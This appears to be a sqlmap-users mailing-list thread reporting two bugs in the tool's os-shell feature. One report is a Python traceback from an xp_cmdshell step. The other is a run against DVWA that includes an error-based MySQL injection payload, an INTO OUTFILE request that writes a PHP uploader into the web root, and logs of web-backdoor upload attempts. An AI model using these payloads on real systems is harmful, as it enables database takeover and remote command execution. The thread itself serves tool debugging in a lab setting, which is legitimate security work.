sqlmap-users

[sqlmap-users] os-shell bug

[ehmo <dis...@gm...>]

[18:57:06] [INFO] testing stacked queries support on parameter 'ID'
[18:57:13] [INFO] the web application supports stacked queries on parameter 'ID'

[18:57:13] [INFO] testing if current user is DBA
[18:57:13] [INFO] retrieved: 0
[18:57:26] [WARNING] the functionality requested might not work because the sess
ion user is not a database administrator
[18:57:26] [INFO] checking if xp_cmdshell extended procedure is available, wait.
.
xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap
 to try to re-enable it? [Y/n] y
[20:30:00] [ERROR] unhandled exception in sqlmap/0.8-dev1, please copy the comma
nd line and the following text and send by e-mail to sql...@li...urcefo
rge.net. The developer will fix it as soon as possible:
sqlmap version: 0.8-dev1
Python version: 2.5.4
Operating system: win32
Traceback (most recent call last):
  File "c:\dev\sqlmap-dev\sqlmap.py", line 84, in main
    start()
  File "c:\dev\sqlmap-dev\lib\controller\controller.py", line 263, in
start
    action()
  File "c:\dev\sqlmap-dev\lib\controller\action.py", line 140, in acti
on
    conf.dbmsHandler.osShell()
  File "c:\dev\sqlmap-dev\plugins\generic\takeover.py", line 300, in o
sShell
    self.initEnv()
  File "c:\dev\sqlmap-dev\lib\takeover\abstraction.py", line 168, in i
nitEnv
    self.xpCmdshellInit(mandatory)
  File "c:\dev\sqlmap-dev\lib\takeover\xp_cmdshell.py", line 181, in x
pCmdshellInit
    self.__xpCmdshellConfigure(1)
  File "c:\dev\sqlmap-dev\lib\takeover\xp_cmdshell.py", line 106, in _
_xpCmdshellConfigure
    if kb.dbmsVersion[0] in ( "2005", "2008" ):
IndexError: list index out of range

[sqlmap-users] os-shell bug

[Robin W. <ro...@di...>]

I think I've found a bug in the os-shell command when specifying extra
directories to try to upload a shell file to. In this example I've
told it the full document root is /opt/lampp/htdocs but I've made a
directory in there called uploads which has full write permissions. I
specify the uploads directory when asked for additional web server
paths, giving it the full server path of /opt/lampp/htdocs/uploads.
Watching the traffic in Burp it first tries to upload to the root
which fails, it then tries the uploads directory but when it checks to
see if the file has been uploaded it checks for the temporary file in
the vulnerabilities directory not the uploads directory. It then tries
an upload to the vulnerabilities directory (it has previously detected
this so I assume that is why it is trying it) and again fails but does
try to check the right directory this time. I've attached a screenshot
from Burp showing the hits.

Manually checking the uploads directory it hasn't managed to upload
the file even though it should be able to as the directory is fully
writable and the db is mysql running as root, I think this could be
down to the query being sent across. I know the decoding here isn't
quite right but it is adding the php to the wrong place in the query:

GET /vulner«ilities/sqli/?id= % LIMIT% 1% INTO% OUTFILE%
%'%/opt%/lampp%/htdocs%/uplo­ads%/tmpuzmzk.php%'% LINES% TERMINATí%
BY% 0x<?php
if (isset($_REQUEST["upload"])) {
    $dir=$_REQUEST["uploadDir"];


I'm doing all of this against DVWA with a manually created uploads directory.

Robin


sqlmap-dev $ ./sqlmap.py -c dvwa.conf --os-shell --proxy=http://localhost:8080

    sqlmap/1.0-dev (r4488) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility
to obey all applicable local, state and federal laws. Authors assume
no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 12:42:06

[12:42:07] [INFO] using
'/Users/robin/src/sqlmap-dev/output/192.168.56.101/session' as session
file
[12:42:07] [INFO] resuming injection data from session file
[12:42:07] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[12:42:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0
HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=12 AND (SELECT 6722 FROM(SELECT
COUNT(*),CONCAT(0x3a64657a3a,(SELECT (CASE WHEN (6722=6722) THEN 1
ELSE 0 END)),0x3a6a76633a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit=Submit
---

[12:42:09] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
[12:42:09] [INFO] going to use a web backdoor for command prompt
[12:42:09] [INFO] fingerprinting the back-end DBMS operating system
[12:42:09] [INFO] the back-end DBMS operating system is Linux
[12:42:09] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3
[12:42:12] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]: /opt/lampp/htdocs
[12:42:19] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload
the agent [Enter for None]: /opt/lampp/uploads/
[12:42:30] [INFO] heuristics detected web page charset 'ascii'
[12:42:33] [WARNING] unable to upload the file stager on '/opt/lampp/htdocs'
[12:42:36] [WARNING] unable to upload the file stager on '/opt/lampp/uploads'
[12:42:38] [WARNING] unable to upload the file stager on
'/opt/lampp/htdocs/vulnerabilities'
[12:42:38] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 3 times
[12:42:38] [INFO] Fetched data logged to text files under
'/Users/robin/src/sqlmap-dev/output/192.168.56.101'

[*] shutting down at 12:42:38